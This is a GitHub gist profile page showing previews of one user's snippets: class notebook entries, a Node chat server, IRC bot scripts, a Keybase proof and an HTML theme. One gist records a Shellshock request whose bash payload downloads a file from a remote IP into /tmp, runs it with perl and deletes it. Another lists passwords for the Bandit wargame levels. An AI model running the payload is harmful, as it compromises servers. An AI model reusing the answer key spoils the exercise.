Skip to content

Instantly share code, notes, and snippets.

View mzhang28's full-sized avatar

michael mzhang28

View GitHub Profile
@mzhang28
mzhang28 / asdf
Created September 23, 2014 22:15
notebook entries
1. 20140825 - Dorian Gray Icebreakers
2. 20140826 - Intro to Rhetorical Situation
3. 20140902 - Rhetorical Situations + Mood Analysis
4. 20140903 - On Writing Well Notes
5. 20140909 - ACT Results + English Patterns
6. 20140915 - Tools for Moving Past Summary
7. 20140920 - They Say / I Say
@mzhang28
mzhang28 / jur
Last active August 29, 2015 14:06
GET /cgi-bin/hello HTTP/1.0" 301 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22
@mzhang28
mzhang28 / gist:f5be7caf35c31211e7e3
Created September 28, 2014 19:21
anhedonia replays
// Load the TCP Library
net = require('net');
// Keep track of the chat clients
var clients = [];
// Start a TCP Server
net.createServer(function (socket) {
// Identify this client

Keybase proof

I hereby claim:

  • I am failedxyz on github.
  • I am failedxyz (https://keybase.io/failedxyz) on keybase.
  • I have a public key whose fingerprint is 091D 3A47 D137 DC0F CEDC 1AD9 F8A8 A156 0109 AA3F

To claim this, I am signing this object:

@mzhang28
mzhang28 / Bandit
Last active August 29, 2015 14:15
Bandit
bandit0 bandit0
bandit1 boJ9jbbUNNfktd78OOpsqOltutMc3MY1
bandit2 CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit3 UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
bandit4 pIwrPrtPN36QITSp3EQaw936yaFoFgAB
bandit5 koReBOKuIDDepwhWk7jZC0RTdopnAYKh
bandit6 DXjZPULLxYr17uwoI01bNLQbtFemEgo7
bandit7 HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
bandit8 cvX2JJa4CFALtqS87jk27qwqGhBM9plV
bandit9 UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
@mzhang28
mzhang28 / heibot.py
Created February 21, 2015 04:08
heibot
import sys;
import socket;
import string;
import random;
HOST = "irc.mibbit.net";
PORT = 6667;
NICK = "heibot";
CHANNEL = "#yolo1";
@mzhang28
mzhang28 / index.html
Last active August 29, 2015 14:15
Theme
<!doctype>
<html>
<head>
<title><$WikiTitle$></title>
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootswatch/3.3.2/simplex/bootstrap.min.css" />
</head>
<body>
<nav class="navbar navbar-default">
<div class="container">
<div class="navbar-header">
import sys;
import socket;
import string;
import random;
import urllib2;
import hashlib;
def genprefix():
return (random.choice("abcdef") + hashlib.md5(random.choice([
"heibot", "asdfbot",
@mzhang28
mzhang28 / Updates.md
Last active August 29, 2015 14:17
CTCTF Updates and Clarifications